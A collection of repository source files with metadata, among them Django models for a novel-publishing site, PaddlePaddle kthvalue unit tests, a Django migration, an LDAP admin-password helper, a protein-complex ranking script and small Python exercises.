c117af46846c1174ea7008f8552fa52b1505a9b8 | ebbfc69c9b14b8fd0e8b51abb0ba4f767abce6e9 | /sandbook/base/models/novel.py | 3e4e8fdb929f8cfbc346753c49db9354d87a73f8 | [] | no_license | lwaxx/novel | 0a882347dffaafb35f061eaf6301abe32254b54f | 5b538e85606cd22c34ac10f53438fc0d3ff131a0 | refs/heads/master | 2022-06-30T03:21:52.673001 | 2020-05-09T15:26:58 | 2020-05-09T15:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,965 | py | import os
import re
import time
from django.core.files.storage import FileSystemStorage
from django.db import models
from base.constants.novel import (
DEFAULT_COVER, NOVEL_STATUS_UNAPPROVED, NOVEL_STATUS_ACTIVE, NOVEL_STATUS_FINISHED,
NOVEL_STATUS_BLOCKED
)
from django.core.cache import cache
from general.utils.text import get_filename_extension, calc_word_count
class CategoryMixin:
@property
def novel_count_key(self):
raise NotImplementedError
def novel_count(self):
return cache.get(self.novel_count_key)
class Category(CategoryMixin, models.Model):
"""
一级分类
"""
name = models.CharField('名称', max_length=32)
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_category'
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'sc_%d_count' % self.id
class SubCategory(CategoryMixin, models.Model):
"""
二级分类
"""
name = models.CharField('名称', max_length=32)
category = models.ForeignKey(Category, on_delete=models.CASCADE, verbose_name='一级分类')
description = models.CharField('描述', max_length=255)
class Meta:
db_table = 'base_novel_sub_category'
default_permissions = ()
def __str__(self):
return self.name
@property
def novel_count_key(self):
return 'c_%d_count' % self.id
def incr_novel_count(self, count: int):
"""
count 可以为正负整数
"""
cache.incr(self.novel_count_key, count)
def cover_path(instance, filename):
new_name = '%s.%s' % (str(int(time.time())), get_filename_extension(filename))
return os.path.join('novel', 'cover', str(instance.author_id), new_name)
class Novel(models.Model):
"""
小说
"""
STATUS = {
'unapproved': NOVEL_STATUS_UNAPPROVED,
'active': NOVEL_STATUS_ACTIVE,
'finished': NOVEL_STATUS_FINISHED,
'blocked': NOVEL_STATUS_BLOCKED,
}
STATUS_CHOICES = (
(STATUS['unapproved'], '未审核'),
(STATUS['active'], '连载中'),
(STATUS['finished'], '已完结'),
(STATUS['blocked'], '已屏蔽')
)
name = models.CharField('书名', unique=True, max_length=64) # TODO: 书名验证
author = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='作者')
intro = models.TextField('简介', max_length=1024)
status = models.SmallIntegerField('状态', choices=STATUS_CHOICES, default=NOVEL_STATUS_UNAPPROVED)
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='一级分类')
sub_category = models.ForeignKey(SubCategory, on_delete=models.SET_NULL, null=True, verbose_name='二级分类')
cover = models.ImageField(
'封面', storage=FileSystemStorage(), default=DEFAULT_COVER,
upload_to=cover_path, blank=True
)
word_count = models.PositiveIntegerField('字数', default=0)
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel'
ordering = ('-id',)
default_permissions = ()
permissions = (
('view_novel', '查看小说'),
('create_novel', '创建小说'),
('change_novel', '更改小说'),
('delete_novel', '删除小说'),
('finish_novel', '完结小说'),
('block_novel', '屏蔽小说'),
('verify_novel', '审核小说')
)
class NovelComment(models.Model):
"""
书评
"""
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说', related_name='comments', )
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户',
related_name='nc_user')
title = models.CharField('标题', max_length=32, blank=True) # 标题可选
content = models.CharField('内容', max_length=4096)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment'
default_permissions = ()
class NovelCommentReply(models.Model):
"""
书评回复
"""
comment = models.ForeignKey(NovelComment, on_delete=models.CASCADE, related_name='replies',
verbose_name='书评')
content = models.CharField('内容', max_length=1024)
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='nc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_comment_reply'
default_permissions = ()
class Volume(models.Model):
"""
卷
"""
name = models.CharField('卷名', max_length=32, default='正文卷')
novel = models.ForeignKey(Novel, on_delete=models.CASCADE, verbose_name='小说')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_volume'
default_permissions = ()
class Chapter(models.Model):
"""
章节
"""
STATUS = {
'saved': 0,
'submitted': 1,
'blocked': 2,
'approved': 3 # 暂不用
}
STATUS_CHOICES = (
(STATUS['saved'], '已保存'),
(STATUS['submitted'], '已提交'),
(STATUS['blocked'], '已屏蔽'),
(STATUS['approved'], '已审核')
)
title = models.CharField('标题', max_length=32, blank=True, default='新章节') # TODO: 章节名验证
content = models.TextField('内容', max_length=65535, blank=True)
volume = models.ForeignKey(Volume, on_delete=models.CASCADE, verbose_name='卷')
word_count = models.PositiveIntegerField('字数', default=0)
is_free = models.BooleanField('免费', default=True)
status = models.IntegerField('状态', choices=STATUS_CHOICES, default=STATUS['saved'])
created_at = models.DateTimeField('创建于', auto_now_add=True)
updated_at = models.DateTimeField('更新于', auto_now=True)
class Meta:
db_table = 'base_novel_chapter'
default_permissions = ()
# class ChapterUpdated(models.Model):
# ...
class Paragraph(models.Model):
"""
段落
"""
chapter = models.ForeignKey(Chapter, on_delete=models.CASCADE, verbose_name='章节')
content = models.TextField('内容', max_length=65535) # TODO: 段落字数限制
serial = models.PositiveIntegerField('序号', default=1)
class Meta:
db_table = 'base_novel_paragraph'
default_permissions = ()
unique_together = (('chapter', 'serial'),)
@property
def word_count(self):
return calc_word_count(self.content)
class ParagraphComment(models.Model):
"""
段评
"""
paragraph = models.ForeignKey(Paragraph, on_delete=models.CASCADE, verbose_name='段落')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True, verbose_name='用户')
content = models.CharField('内容', max_length=1024)
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment'
default_permissions = ()
class ParagraphCommentReply(models.Model):
"""
段评回复
"""
paragraph_comment = models.ForeignKey(ParagraphComment, on_delete=models.CASCADE, verbose_name='段评')
user = models.ForeignKey('base.User', on_delete=models.SET_NULL, null=True,
related_name='pc_reply_user', verbose_name='回复用户')
created_at = models.DateTimeField('创建于', auto_now_add=True)
class Meta:
db_table = 'base_novel_paragraph_comment_reply'
default_permissions = ()
| [
"[email protected]"
] | |
dcd9d496ee0141ea04f9a8c83b711f5ce5252089 | ffc1cc3bb7b68335b115122fdc7924fc4e31d528 | /pro38.py | fd23c4fc45f9509da980b95618a4cae2a5d6442b | [] | no_license | Rihanashariff/swathi24 | dba1dd3c3d2ff583ae431b432e0ef262bfeb3ac3 | 2b0d21f2febdd2a563e8f0affeebd5ca7a5821b8 | refs/heads/master | 2020-07-02T05:28:32.199982 | 2019-06-29T08:22:10 | 2019-06-29T08:22:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 132 | py | #s
n,k = map(int,input().split())
l = list(map(int,input().split()))
c= 0
for i in l:
if(i+k <=5):
c+=1
g=c//3
print(g)
| [
"[email protected]"
] | |
cc09ec3dc544f923a01256d80c96928a1ec33d28 | 0dc24a6e729a4b438fbcd9cfb72da3b6ee716d77 | /ksiazka_zrob_to_sam/my_electric_car.py | 10fbec7652bb7144eb706ddd63de707e5df80507 | [] | no_license | Licho59/learning_python_eric_matthes_book | fca84a2bff207c10dec20c7fea9aeacf05d6a101 | 969f95132822d8bd21c30403d8e0bf6aadb9914f | refs/heads/master | 2021-09-01T03:41:37.281741 | 2017-12-24T15:12:13 | 2017-12-24T15:12:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 784 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 8 21:20:17 2017
@author: Leszek
"""
from car import ElectricCar
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
my_tesla.battery.describe_battery()
my_tesla.battery.get_range()
# Import wielu klas z modułu
from car import Car, ElectricCar
my_beetle = Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Import całego modułu
import car
my_beetle = car.Car('volkswagen', 'beetle', 2016)
print(my_beetle.get_descriptive_name())
my_tesla = car.ElectricCar('tesla', 'model s', 2016)
print(my_tesla.get_descriptive_name())
# Import wszystkich klas modułu
from car import *
| [
"[email protected]"
] | |
5487773f243f788ebc92256016ebad447a41750c | d5f75adf5603927396bdecf3e4afae292143ddf9 | /python/paddle/fluid/tests/unittests/test_kthvalue_op.py | 66eb8ab4f31fba1ef8cb7eee8a8896077b683a1f | [
"Apache-2.0"
] | permissive | jiweibo/Paddle | 8faaaa1ff0beaf97ef7fb367f6c9fcc065f42fc4 | 605a2f0052e0ffb2fab3a4cf4f3bf1965aa7eb74 | refs/heads/develop | 2023-07-21T03:36:05.367977 | 2022-06-24T02:31:11 | 2022-06-24T02:31:11 | 196,316,126 | 3 | 2 | Apache-2.0 | 2023-04-04T02:42:53 | 2019-07-11T03:51:12 | Python | UTF-8 | Python | false | false | 6,945 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle
import paddle.fluid as fluid
def cal_kthvalue(x, k, axis, keepdim=False):
if axis < 0:
axis = len(x.shape) + axis
indices = np.argsort(x, axis=axis)
value = np.sort(x, axis=axis)
indices = indices.take(indices=k - 1, axis=axis)
value = value.take(indices=k - 1, axis=axis)
if keepdim:
indices = np.expand_dims(indices, axis)
value = np.expand_dims(value, axis)
return value, indices
class TestKthvalueOp(OpTest):
def init_args(self):
self.k = 5
self.axis = -1
def setUp(self):
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((2, 1, 2, 4, 10))
self.init_args()
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpWithKeepdim(OpTest):
def init_args(self):
self.k = 2
self.axis = 1
def setUp(self):
self.init_args()
self.op_type = "kthvalue"
self.python_api = paddle.kthvalue
self.dtype = np.float64
self.input_data = np.random.random((1, 3, 2, 4, 10))
self.inputs = {'X': self.input_data}
self.attrs = {'k': self.k, 'axis': self.axis, 'keepdim': True}
output, indices = cal_kthvalue(self.input_data,
k=self.k,
axis=self.axis,
keepdim=True)
self.outputs = {'Out': output, 'Indices': indices}
def test_check_output(self):
paddle.enable_static()
self.check_output(check_eager=True)
def test_check_grad(self):
paddle.enable_static()
self.check_grad(set(['X']), 'Out', check_eager=True)
class TestKthvalueOpKernels(unittest.TestCase):
def setUp(self):
self.axises = [2, -1]
def test_kthvalue_op(self):
paddle.disable_static()
def test_cpu_kernel():
shape = (2, 128, 10)
k = 2
paddle.set_device('cpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
def test_gpu_kernel():
shape = (2, 30, 250)
k = 244
paddle.set_device('gpu')
inputs = np.random.random(shape)
tensor = paddle.to_tensor(inputs)
for axis in self.axises:
value_expect, indice_expect = cal_kthvalue(inputs, k, axis)
v, inds = paddle.kthvalue(tensor, k, axis)
self.assertTrue(np.allclose(v.numpy(), value_expect))
self.assertTrue(np.allclose(inds.numpy(), indice_expect))
test_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_gpu_kernel()
class TestKthvalueOpWithNaN(unittest.TestCase):
def setUp(self):
paddle.disable_static()
self.x = paddle.uniform([2, 200, 10], dtype='float32')
def test_errors(self):
def test_nan_in_cpu_kernel():
paddle.set_device('cpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
def test_nan_in_gpu_kernel():
paddle.set_device('gpu')
nan_position = 100
self.x[0, nan_position, 2] = float('nan')
v, inds = self.x.kthvalue(k=200, axis=1)
self.assertTrue(np.isnan(v[0, 2].numpy()[0]))
self.assertEqual(inds[0, 2].numpy()[0], nan_position)
test_nan_in_cpu_kernel()
if fluid.core.is_compiled_with_cuda():
test_nan_in_gpu_kernel()
class TestKthvalueOpErrors(unittest.TestCase):
def setUp(self):
self.x = paddle.uniform([2, 10, 20, 25], dtype='float32')
def test_errors(self):
paddle.disable_static()
def test_k_lowrange_error():
self.x.kthvalue(k=0, axis=2)
self.assertRaises(ValueError, test_k_lowrange_error)
def test_k_uprange_error():
self.x.kthvalue(k=500, axis=2)
self.assertRaises(ValueError, test_k_uprange_error)
def test_dim_range_error():
self.x.kthvalue(k=10, axis=5)
self.assertRaises(ValueError, test_dim_range_error)
class TestModeOpInStatic(unittest.TestCase):
def setUp(self):
np.random.seed(666)
self.input_data = np.random.random((2, 20, 1, 2, 80)).astype(np.float64)
self.k = 10
def test_run_static(self):
paddle.enable_static()
with paddle.static.program_guard(paddle.static.Program(),
paddle.static.Program()):
input_tensor = paddle.static.data(name="x",
shape=[2, 20, 1, 2, 80],
dtype="float64")
result = paddle.kthvalue(input_tensor, self.k, axis=1)
expect_value = cal_kthvalue(self.input_data, self.k, axis=1)[0]
exe = paddle.static.Executor(paddle.CPUPlace())
paddle_result = exe.run(feed={"x": self.input_data},
fetch_list=[result])[0]
self.assertTrue(np.allclose(paddle_result, expect_value))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
a272e1b11c4ec4f975a6dd241d020af9876ef059 | 6d8ed9e06e7783443fac3d100a4fdea304d5d64e | /dashboard/internet_nl_dashboard/migrations/0036_urllistreport_average_internet_nl_score.py | de64746ac2b34bee044538ef4f70302d905e030b | [
"Apache-2.0"
] | permissive | internetstandards/Internet.nl-dashboard | 399c6d13d66bbc56b1a5b964a727cc299d351bd8 | f1f68352a173689e2386d790f69bd28640a75e09 | refs/heads/main | 2023-08-31T21:01:42.739287 | 2023-07-12T10:51:16 | 2023-07-12T10:51:16 | 175,843,928 | 7 | 8 | Apache-2.0 | 2023-09-13T08:45:51 | 2019-03-15T15:16:49 | JavaScript | UTF-8 | Python | false | false | 667 | py | # Generated by Django 2.2.2 on 2019-06-28 07:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('internet_nl_dashboard', '0035_auto_20190624_0712'),
]
operations = [
migrations.AddField(
model_name='urllistreport',
name='average_internet_nl_score',
field=models.FloatField(
default=0, help_text='Internet.nl scores are retrieved in point. The calculation done for that is complex and subject to change over time. Therefore it is impossible to re-calculate that score here.Instead the score is stored as a given.'),
),
]
| [
"[email protected]"
] | |
b363e6a7cb06107e6b57f522269db06f2372e699 | 7be4f595d555614a28f708c1ba7edda321f0cf30 | /practice/algorithms/implementation/find_digits/find_digits.py | 944aa7f96b379dc5bf1efe15f35da50bb098ef74 | [] | no_license | orel1108/hackerrank | de31a2d31aaf8aeb58477d1f2738744bfe492555 | 55da1f3a94e8c28ed0f0dea3103e51774f0047de | refs/heads/master | 2021-04-09T17:38:25.112356 | 2017-01-22T11:21:19 | 2017-01-22T11:21:19 | 50,198,159 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | t = int(raw_input())
for _ in range(t) :
n = raw_input()
digits = map(int, n)
print len(filter(lambda x: x > 0 and int(n) % x == 0, digits))
| [
"[email protected]"
] | |
0439f06409ab6778d84756e8fa98bb4cb7bd9058 | cb20ef5b4048457a2e6dca4a4cb45c53c9843744 | /test/rosapi/1.0/actions/data.logrotate.py | c1b93af96b263f644f14def92db35a78ef176b57 | [] | no_license | rudecs/openvcloud | 5001b77e8d943427c1bed563f3dcc6b9467936e2 | 12ccce2a54034f5bf5842e000c2cc3d7e22836d8 | refs/heads/master | 2020-03-24T00:00:10.422677 | 2018-11-22T13:41:17 | 2018-11-22T13:41:17 | 142,267,808 | 2 | 1 | null | 2018-07-25T08:02:37 | 2018-07-25T08:02:36 | null | UTF-8 | Python | false | false | 54 | py | def main(j,jp):
#remove old logs
pass
| [
"devnull@localhost"
] | devnull@localhost |
20ea0483a27f1041660bd88552c58835f78d876e | b08d42933ac06045905d7c005ca9c114ed3aecc0 | /src/coefSubset/evaluate/ranks/tenPercent/rank_1bj1_H.py | 1bc2f459e6bf336ab3b52b79623a3fec22f210a6 | [] | no_license | TanemuraKiyoto/PPI-native-detection-via-LR | d148d53f5eb60a4dda5318b371a3048e3f662725 | 897e7188b0da94e87126a4acc0c9a6ff44a64574 | refs/heads/master | 2022-12-05T11:59:01.014309 | 2020-08-10T00:41:17 | 2020-08-10T00:41:17 | 225,272,083 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,386 | py | # 9 July 2019
# Kiyoto Aramis Tanemura
# Several metrics are used to assess the performance of the trained RF model, notably native ranking. This script returns a ranking of the native protein-protein complex among a decoy set. For convenience, I will define as a function and will call in a general performance assessment script.
# Modified 11 July 2019 by Kiyoto Aramis Tanemura. To parallelize the process, I will replace the for loop for the testFileList to a multiprocessing pool.
# Modified 9 September 2019 by Kiyoto Aramis Tanemura. I will use the function to perform the calculation on one CSV file only. Thus instead of a function to import in other scripts, they will be individual jobs parallelized as individual jobs in the queue.
import os
import pandas as pd
import numpy as np
import pickle
os.chdir('/mnt/scratch/tanemur1/')
# Read the model and trainFile
testFile = '1bj1.csv'
identifier = 'H'
coefFrac = 0.1
testFilePath = '/mnt/scratch/tanemur1/CASF-PPI/nonb_descriptors/complete/'
modelPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/tenPercent/'
outputPath = '/mnt/home/tanemur1/6May2019/2019-11-11/results/coefSubset/evaluate/tenPercent/ranks/'
pdbID = testFile[:4]
with open(modelPath + 'model' + identifier + '.pkl', 'rb') as f:
clf = pickle.load(f)
result = pd.DataFrame()
scoreList = []
df1 = pd.read_csv(testFilePath + testFile)
dropList = ['Unnamed: 0', 'Unnamed: 0.1', 'ref']
df1 = df1.drop(dropList, axis = 1)
df1 = df1.set_index('Pair_name')
df1 = pd.DataFrame(df1.values.T, columns = df1.index, index = df1.columns)
df1.fillna(0.0, inplace = True)
#df1 = df1.reindex(sorted(df1.columns), axis = 1)
# Keep coefficients within the given fraction when ordered by decreasing order of coefficient magnitude
coefs = pd.read_csv('/mnt/home/tanemur1/6May2019/2019-11-11/results/medianCoefs.csv', index_col = 0, header = None, names = ['coefficients'])
coefs['absVal'] = np.abs(coefs['coefficients'])
coefs.sort_values(by = 'absVal', ascending = False, inplace = True)
coefs = coefs[:int(14028 * coefFrac + 0.5)]
keepList = list(coefs.index)
del coefs
df1 = df1[keepList]
df1 = df1.reindex(sorted(df1.columns), axis = 1)
with open(modelPath + 'standardScaler' + identifier + '.pkl', 'rb') as g:
scaler = pickle.load(g)
for i in range(len(df1)):
# subtract from one row each row of the dataframe, then remove the trivial row[[i]] - row[[i]]. Also some input files have 'class' column. This is erroneous and is removed.
df2 = pd.DataFrame(df1.iloc[[i]].values - df1.values, index = df1.index, columns = df1.columns)
df2 = df2.drop(df1.iloc[[i]].index[0], axis = 0)
# Standardize inut DF using the standard scaler used for training data.
df2 = scaler.transform(df2)
# Predict class of each comparison descriptor and sum the classes to obtain score. Higher score corresponds to more native-like complex
predictions = clf.predict(df2)
score = sum(predictions)
scoreList.append(score)
# Make a new DataFrame to store the score and corresponding descriptorID. Add rank as column. Note: lower rank corresponds to more native-like complex
result = pd.DataFrame(data = {'score': scoreList}, index = df1.index.tolist()).sort_values(by = 'score', ascending = False)
result['rank'] = range(1, len(result) + 1)
with open(outputPath + pdbID + identifier + '.csv', 'w') as h:
result.to_csv(h)
| [
"[email protected]"
] | |
444d45bf3c5ac155b55dfd08b8250911a948e0c8 | a550aece79bda789826b463280b91abffbf2d372 | /books/python-3-oop-packt/Chapter7/7_28_callable_repeat.py | 09746de64e095feb18df107627ebdb96c1fe1546 | [
"MIT"
] | permissive | phiratio/learn_python | 20376470eaa292c157fd01f52b3077e3a983cd5a | a32240d4355fb331805d515f96e1d009914e5c47 | refs/heads/master | 2022-11-27T07:07:45.712373 | 2020-12-03T22:04:31 | 2020-12-03T22:04:31 | 189,397,679 | 1 | 0 | MIT | 2022-11-22T04:40:27 | 2019-05-30T10:56:10 | Python | UTF-8 | Python | false | false | 469 | py | from timer import Timer
import datetime
def format_time(message, *args):
now = datetime.datetime.now().strftime("%I:%M:%S")
print(message.format(*args, now=now))
class Repeater:
def __init__(self):
self.count = 0
def __call__(self, timer):
format_time("{now}: repeat {0}", self.count)
self.count += 1
timer.call_after(5, self)
timer = Timer()
timer.call_after(5, Repeater())
format_time("{now}: Starting")
timer.run()
| [
"[email protected]"
] | |
088099fe03d5e3dee4df77f61ea5cb2aa08d45d5 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /M8hDPzNZdie8aBMcb_11.py | f8aa226b0f1d8e00377c89c45f1f158d226792c3 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | """
Implement a function count_substring that counts the number of substrings that
begin with character "A" and ends with character "X".
For example, given the input string `"CAXAAYXZA"`, there are four substrings
that begin with "A" and ends with "X", namely: "AX", "AXAAYX", "AAYX", and
"AYX".
### Examples
count_substring("CAXAAYXZA") ➞ 4
count_substring("AAXOXXA") ➞ 6
count_substring("AXAXAXAXAX") ➞ 15
### Notes
* You should aim to avoid using nested loops to complete the task.
* You can assume that the input string is composed of English upper case letters only.
"""
def count_substring(txt: str) -> int:
return sum(txt[i:].count('X') for i,v in enumerate(txt[:-1]) if v == 'A')
| [
"[email protected]"
] | |
5458665911175eba625d5f5b7fc0cc7853562425 | 9d82e37d34ed4d836fcef98ed37ed7ac5c49b316 | /ibmsecurity/isam/web/embedded_ldap/admin.py | a068695630ebb77e72b212d90faed1a94943d4d2 | [
"Apache-2.0"
] | permissive | keiran-ibm/ibmsecurity | 075c156961e371c0e85a7c360fb2d82954315bb6 | b1a77f7a1e8c3cce67e2c3af85c20626d42c0bbd | refs/heads/master | 2022-02-14T14:24:15.687461 | 2019-01-18T05:21:19 | 2019-01-18T05:21:19 | 116,325,033 | 0 | 0 | Apache-2.0 | 2019-01-18T05:16:46 | 2018-01-05T01:23:35 | Python | UTF-8 | Python | false | false | 643 | py | import logging
logger = logging.getLogger(__name__)
def set_pw(isamAppliance, password, check_mode=False, force=False):
"""
Changing the administrator password of the embedded LDAP server
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_post("Changing the administrator password of the embedded LDAP server",
"/isam/embedded_ldap/change_pwd/v1",
{
"password": password
})
| [
"[email protected]"
] | |
be65e8b6843e01ce485befc48c2d14bde2967dea | 7bc54bae28eec4b735c05ac7bc40b1a8711bb381 | /src/contradiction/medical_claims/alamri/tfrecord_gen.py | 5ddfa13b77c7f7eda2cea802707861ff4e6e6373 | [] | no_license | clover3/Chair | 755efd4abbd5f3f2fb59e9b1bc6e7bc070b8d05e | a2102ebf826a58efbc479181f1ebb5de21d1e49f | refs/heads/master | 2023-07-20T17:29:42.414170 | 2023-07-18T21:12:46 | 2023-07-18T21:12:46 | 157,024,916 | 0 | 0 | null | 2023-02-16T05:20:37 | 2018-11-10T21:55:29 | Python | UTF-8 | Python | false | false | 3,932 | py | import json
import os
from typing import Iterator
from contradiction.medical_claims.alamri.pairwise_gen import enum_true_instance, enum_neg_instance, enum_neg_instance2, \
enum_neg_instance_diff_review
from contradiction.medical_claims.biobert.voca_common import get_biobert_tokenizer
from cpath import at_output_dir, output_path
from data_generator.cls_sep_encoder import get_text_pair_encode_fn, PairedInstance
from data_generator.tokenizer_wo_tf import get_tokenizer
from misc_lib import DataIDManager, exist_or_mkdir
from tf_util.record_writer_wrap import write_records_w_encode_fn
Entailment = 0
Neutral = 1
Contradiction = 2
def generate_true_pairs(data_id_man):
yield from generate_inner(data_id_man, enum_true_instance)
def generate_neg_pairs(data_id_man):
enum_fn = enum_neg_instance
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs2(data_id_man) -> Iterator[PairedInstance]:
enum_fn = enum_neg_instance2
yield from generate_inner(data_id_man, enum_fn)
def generate_neg_pairs_diff_review(data_id_man):
enum_fn = enum_neg_instance_diff_review
yield from generate_inner(data_id_man, enum_fn)
def generate_inner(data_id_man, enum_fn) -> PairedInstance:
for c1, c2, pair_type in enum_fn():
info = {
'text1': c1.text,
'text2': c2.text,
'pair_type': pair_type
}
inst = PairedInstance(c1.text, c2.text, data_id_man.assign(info), Neutral)
yield inst
def generate_and_write(file_name, generate_fn, tokenizer):
data_id_man = DataIDManager()
inst_list = generate_fn(data_id_man)
max_seq_length = 300
save_path = at_output_dir("alamri_tfrecord", file_name)
encode_fn = get_text_pair_encode_fn(max_seq_length, tokenizer)
write_records_w_encode_fn(save_path, encode_fn, inst_list)
info_save_path = at_output_dir("alamri_tfrecord", file_name + ".info")
json.dump(data_id_man.id_to_info, open(info_save_path, "w"))
def bert_true_pairs():
tokenizer = get_tokenizer()
file_name = "bert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_true_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_true_pairs"
generate_fn = generate_true_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs"
generate_fn = generate_neg_pairs
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs2():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs2():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs2"
generate_fn = generate_neg_pairs2
generate_and_write(file_name, generate_fn, tokenizer)
def bert_neg_pairs_diff_review():
tokenizer = get_tokenizer()
file_name = "bert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def biobert_neg_pairs_diff_review():
tokenizer = get_biobert_tokenizer()
file_name = "biobert_neg_pairs_diff_review"
generate_fn = generate_neg_pairs_diff_review
generate_and_write(file_name, generate_fn, tokenizer)
def main():
exist_or_mkdir(os.path.join(output_path, "alamri_tfrecord"))
bert_neg_pairs_diff_review()
biobert_neg_pairs_diff_review()
# bert_neg_pairs2()
# biobert_neg_pairs2()
# bert_true_pairs()
# bert_neg_pairs()
# biobert_true_pairs()
# biobert_neg_pairs()
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
b324821f4e1cb588672bdca6d07e05ff834b9547 | a939ec03a7eb31962817d6cffea7f125ea4d69db | /DataScience/pandas/Example02_series.py | 9983ac491066a66c45841303c88fcc293db3bfb3 | [] | no_license | dipayandutta/python3 | e21e50d7a21315bc63702a103af79f3d61d91ab1 | f3d01ea52d05a23103cf86afbf5dff64a5d36634 | refs/heads/master | 2022-12-10T09:13:04.967400 | 2021-07-25T15:20:40 | 2021-07-25T15:20:40 | 153,072,927 | 0 | 0 | null | 2022-11-22T02:24:01 | 2018-10-15T07:46:28 | Python | UTF-8 | Python | false | false | 144 | py | #Manually assign index values to a series
import pandas as pd
series = pd.Series(['Dipayan','Ruby'],index=['Husband','spouse'])
print(series) | [
"[email protected]"
] | |
5f956a3f925ac4a9a724e8128b079d5b8afa2c82 | 45734abde30b437c2a1ba80653d7323e5c1d8c7f | /python/0320_generalized_abbreviation.py | f56e22143bc7bf3043f75dbf895dd29533b46079 | [] | no_license | rdtr/leetcode_solutions | 6629e03dd5b5fee15aaabe7f53204778f237ed96 | 51800d33c57e36ef62b6067d6f91a82c0e55dc6d | refs/heads/main | 2022-05-21T12:17:23.201832 | 2022-03-12T09:20:46 | 2022-03-12T09:20:46 | 80,395,988 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from collections import deque
class Solution:
def generateAbbreviations(self, word: str) -> List[str]:
res = []
self.helper(word, 0, 0, '', res)
return res
def helper(self, word, pos, length, cur, res):
if pos >= len(word):
if length > 0:
cur += str(length)
res.append(cur)
return
if length == 0: # just consume one character
self.helper(word, pos + 1, 0, cur + word[pos], res)
else: # perform abbr
self.helper(word, pos + 1, 0, cur + str(length) + word[pos], res)
# skip this character and increment abbr length
self.helper(word, pos + 1, length + 1, cur, res)
| [
